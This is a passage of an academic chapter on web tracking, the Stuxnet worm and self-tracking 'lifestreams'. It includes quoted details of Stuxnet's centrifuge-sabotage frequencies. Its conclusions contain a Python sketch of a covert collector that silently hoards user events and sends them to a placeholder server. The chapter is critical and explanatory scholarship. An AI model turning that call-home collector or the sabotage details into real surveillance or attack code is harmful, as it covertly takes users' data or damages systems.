&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent to which users are just not aware of the subterranean depths of their computational devices and the ability of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This issue is helpfully illustrated by the next case study, of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system, which it then plays back to the operators to disguise the fact that it is gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals, so that an infected system does not exhibit abnormal behavior and therefore does not raise the alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotage, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010). A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
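&lt;br /&gt;
The logic of this record-then-replay deception can be illustrated schematically. The following is a purely illustrative sketch (in Python; no real PLC code, and all values are invented) of sensor readings being recorded in a first phase and then played back to the operators’ display while the real process diverges: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import itertools&lt;br /&gt;
&lt;br /&gt;
recorded = []&lt;br /&gt;
&lt;br /&gt;
def pass_through(value):&lt;br /&gt;
    # Phase 1: behave normally while quietly building up a recording.&lt;br /&gt;
    recorded.append(value)&lt;br /&gt;
    return value&lt;br /&gt;
&lt;br /&gt;
def replay():&lt;br /&gt;
    # Phase 2: the operators' display sees only the old, healthy values.&lt;br /&gt;
    return itertools.cycle(recorded)&lt;br /&gt;
&lt;br /&gt;
for value in [1064, 1063, 1064, 1065]:    # nominal frequencies (Hz)&lt;br /&gt;
    pass_through(value)&lt;br /&gt;
&lt;br /&gt;
shown = replay()&lt;br /&gt;
for _ in range(6):&lt;br /&gt;
    print('operator display:', next(shown), 'Hz')&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;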
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm suggest that at least thirty people would have had to work on it simultaneously. This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that are neither public nor known to the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach of its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLC (Programmable Logic Controller) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet were: (1) to identify its target precisely, using a number of software-based markers that gave away the physical identity of the location – indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) to disengage control systems from physical systems, providing a stealth infection of the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller (315) was designed to slowly reduce the speed of the rotors, leading to cracks and failures, while the second, larger warhead (417) manipulated valves in the centrifuges, faking industrial process control sensor signals by modeling the centrifuges, which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a) &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet’s origin has been hypothesized from an analysis of the approximately 15,000 lines of programming code. This involved a close reading and reconstruction of the programming logic: taking the machine code, disassembling it, and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what it was doing (Langner, 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see Table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
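&lt;br /&gt;
One step in such a close reading can be illustrated simply: extracting printable strings from a binary image, the kind of technique by which artefacts such as the ‘myrtus’ file path become visible. A minimal sketch (in Python; the sample bytes are invented): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import re&lt;br /&gt;
&lt;br /&gt;
# Invented sample: machine code surrounding an embedded file path.&lt;br /&gt;
binary = b'\x00\x8bE\xfcb:\\myrtus\\src\\guava.pdb\x00\x90\x90'&lt;br /&gt;
&lt;br /&gt;
# Runs of four or more printable ASCII characters.&lt;br /&gt;
for match in re.finditer(rb'[ -~]{4,}', binary):&lt;br /&gt;
    print(match.group().decode('ascii'))&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;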
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan -&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild, it is relatively trivial to decode it and so learn, in a very short time, techniques that would otherwise have taken many years to develop. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one whose purpose is linked to the collection of data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increasing ability of software and code, via computational devices, to covertly monitor, control and mediate, both positively and negatively, is not just a matter of interventions that deceive the human and non-human actors who make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, as part of the notion of lifestreams, and more particularly the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have grown in recent years alongside the ‘real-time streams’ platforms, such as Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. It closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations that wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
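&amp;lt;br&amp;gt; The ‘anonymised and aggregated’ step mentioned here is itself only a small piece of code. A minimal sketch of the idea in Python (the field names and data are invented; real systems would need far stronger guarantees than a bare salted hash): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import hashlib
from collections import defaultdict
from statistics import mean

def anonymise(record, salt='app-secret'):
    # Replace the direct identifier with a salted one-way hash.
    record = dict(record)
    record['user'] = hashlib.sha256((salt + record['user']).encode()).hexdigest()[:12]
    return record

def aggregate(records):
    # Pool per-user readings, then report only summary statistics.
    per_user = defaultdict(list)
    for r in map(anonymise, records):
        per_user[r['user']].append(r['units'])
    return {user: mean(values) for user, values in per_user.items()}

readings = [{'user': 'alice', 'units': 3}, {'user': 'alice', 'units': 5},
            {'user': 'bob', 'units': 2}]
print(aggregate(readings))  # pseudonymous means, no raw identities
&amp;lt;/pre&amp;gt; &lt;br /&gt;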
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
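&amp;lt;br&amp;gt; Freeman’s description translates almost directly into a data structure: a single time-ordered sequence with a ‘now’ pointer, past documents behind it, future reminders ahead of it, and a small set of operators over the whole. A minimal sketch, assuming nothing beyond the quoted description (the class and method names are my own): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import time
from bisect import bisect, insort
from dataclasses import dataclass, field

@dataclass(order=True)
class Document:
    timestamp: float                     # seconds since the epoch
    content: str = field(compare=False)  # ordering is by time alone

class Lifestream:
    # A single time-ordered stream of documents (after Freeman, 2000).

    def __init__(self):
        self.docs = []  # tail = past documents, head = future reminders

    def store(self, content, timestamp=None):
        # Every document lands in the one stream; no folders, no filing.
        insort(self.docs, Document(timestamp or time.time(), content))

    def substream(self, keyword):
        # 'Organize information on demand': filter rather than file.
        return [d for d in self.docs if keyword in d.content]

    def split_at_now(self):
        # Past documents sit behind the present; reminders lie ahead of it.
        i = bisect(self.docs, Document(time.time(), ''))
        return self.docs[:i], self.docs[i:]
&amp;lt;/pre&amp;gt; &lt;br /&gt;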
&amp;lt;br&amp;gt; Gelernter originally described these as ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions in relation to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, with its text-message sized updates of 140 characters. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks and so forth are factored in. Stephen Wolfram was one of the first people to collect his data systematically, starting in 1989. As he explains: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kind of sophisticated sensory circuitry that is common in smartphones, to log GPS location, direction of travel, etc. This is where life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard that is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed (a concrete example of the serialisation follows the quotation below): &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
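Concretely, the serialisation specified by the working group names these components as fields of a JSON object. The sketch below follows the JSON Activity Streams 1.0 layout (ActivityStreamsWG, 2011) for the ‘Geraldine’ example quoted above; the identifiers and URLs are placeholders: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import json

# 'Geraldine posted a photo to her album' as a JSON Activity Streams 1.0
# activity: an actor, a verb, an object and a target (placeholder URLs).
activity = {
    'published': '2011-02-10T15:04:55Z',
    'actor': {
        'objectType': 'person',
        'id': 'urn:example:person:geraldine',  # placeholder identifier
        'displayName': 'Geraldine',
    },
    'verb': 'post',
    'object': {
        'objectType': 'photo',
        'id': 'urn:example:photo:9261',
        'url': 'http://example.org/geraldine/photos/9261',
    },
    'target': {
        'objectType': 'photo-album',
        'displayName': 'Geraldine\'s Photo Album',
    },
}

print(json.dumps(activity, indent=2))
&amp;lt;/pre&amp;gt; &lt;br /&gt;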
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case, in other words for the individual user (or lifestreamer) and the organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or a population, group, or class of others.[13] &lt;br /&gt;
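&amp;lt;br&amp;gt; In its simplest individual form, this comparison against a norm is no more than a deviation test over a time series. A schematic example in Python (the data and threshold are invented for illustration): &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
from statistics import mean, stdev

def flag_deviations(samples, baseline, threshold=2.0):
    # Flag data points lying more than 'threshold' standard
    # deviations from a population baseline.
    mu, sigma = mean(baseline), stdev(baseline)
    return [(day, x) for day, x in enumerate(samples)
            if abs(x - mu) / sigma &gt; threshold]

# e.g. a week of step counts against a (made-up) population norm
population = [7000, 8200, 7600, 6900, 8100, 7400, 7900]
user_week = [7100, 7300, 2100, 7800, 15200, 7600, 7000]
print(flag_deviations(user_week, population))  # flags the outlying days
&amp;lt;/pre&amp;gt; &lt;br /&gt;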
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, both in terms of providing steers for behaviour, norms and so forth, and in offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally amounts to the construction of a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligoptica (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that make the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narratives for the actor, through the stabilisation of a web of meaning.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed very productive knowledge can be generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software in order to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time, whilst secreting themselves within our computer systems, raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data, and seem genuinely to find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs, in many ways, are life streams - albeit life streams that have not been authorized by the user whom they are monitoring. These are what we might call ''compactants'', designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to draw particular attention to this passive-aggressive feature of computational agents that collect information: both in terms of their passive quality - under the surface, relatively benign and silent - and the fact that they are aggressive in their hoarding of data - monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of compactness as conciseness in expression. The etymology, from the Latin ''compactus'', closely put together or joined together, also neatly expresses the sense of what web bugs and related technologies are. Compactants are additionally useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation is often offloaded to the ‘cloud’: server computers designed specifically for the task and accessed via networks. Indeed, many viruses often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
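This dichotomous structure - silent local accumulation on one side, offloaded processing and ‘calling home’ on the other - can be caricatured in a few lines of Python. Everything below is hypothetical (the endpoint URL and field names are invented); the point is only to show how small such a passive-aggressive collector can be: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import json
import time
import urllib.request

class Compactant:
    # Caricature of a computational actant: quietly hoards events locally,
    # then periodically reports them to a remote aggregator (invented URL).

    def __init__(self, endpoint='http://example.org/collect'):
        self.endpoint = endpoint
        self.hoard = []  # the passive side: silent local accumulation

    def observe(self, event):
        self.hoard.append({'t': time.time(), 'event': event})

    def call_home(self):
        # The aggressive side: ship everything collected to the 'cloud'.
        body = json.dumps(self.hoard).encode('utf-8')
        request = urllib.request.Request(
            self.endpoint, data=body,
            headers={'Content-Type': 'application/json'})
        urllib.request.urlopen(request)  # would fail against the placeholder
        self.hoard.clear()
&amp;lt;/pre&amp;gt; &lt;br /&gt;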
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the ‘future self’ will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative context of a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally, or without due regard to what has been described as ‘future self continuity’ (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real - not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering is itself a relatively recent discipline and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy: the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
